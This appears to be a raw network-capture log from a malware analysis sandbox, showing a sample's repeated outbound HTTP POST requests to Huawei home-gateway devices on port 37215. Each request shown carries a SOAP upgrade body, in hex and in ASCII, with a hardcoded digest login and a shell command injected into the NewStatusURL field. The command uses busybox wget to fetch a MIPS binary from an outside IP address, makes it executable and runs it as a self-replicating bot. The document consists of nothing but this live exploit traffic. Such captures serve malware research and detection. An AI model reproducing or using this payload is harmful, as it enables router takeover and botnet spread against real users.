                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1156192.168.2.234493060.174.221.11637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529985905 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1157192.168.2.2342614197.237.181.5537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529985905 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1158192.168.2.233827641.220.170.16337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530023098 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1159192.168.2.234109841.140.149.16037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530023098 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1160192.168.2.2340066197.114.209.11037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530023098 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1161192.168.2.235128441.111.212.17237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530210018 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1162192.168.2.2353842197.107.122.8737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530234098 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1163192.168.2.2358310157.174.103.20837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530281067 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1164192.168.2.233620460.151.156.13637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530366898 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1165192.168.2.2333898157.245.139.5237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530405998 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
